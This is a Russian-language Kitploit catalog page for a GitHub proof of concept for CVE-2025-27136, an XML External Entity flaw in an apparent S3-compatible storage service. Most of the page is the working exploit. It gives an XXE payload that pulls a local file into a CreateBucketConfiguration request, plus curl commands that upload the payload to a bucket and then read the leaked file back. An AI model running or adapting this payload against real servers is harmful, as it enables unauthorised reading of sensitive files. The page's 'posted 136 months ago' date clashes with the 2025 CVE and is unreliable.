Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-27136 — PoC внешней сущности XML в S3. | Kitploit
Инструменты/GitHubGitHub/issaboudin/cve-2025-27136
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеБезопасность облачных сред
GitHubissaboudin/cve-2025-27136

CVE-2025-27136

PoC внешней сущности XML в S3.

Репозиторий
136 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-27136

Эксплуатация уязвимости XML External Entity (XXE).

Использование XML-полезной нагрузки для получения конфиденциальных файлов (PoC)

test.xml

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///path/to/file">
]>
<CreateBucketConfiguration>
  <LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>

Используйте curl для загрузки test.xml с локальной машины в bucket.

root@kitploit:~
curl -X PUT http://127.0.0.1:PORT/TB1 -H "Content-Type: application/xml" -d @test.xml

Запустите эксплойт и получите файл

root@kitploit:~
curl http://127.0.0.1:PORT/TB1?location
Скачать инструмент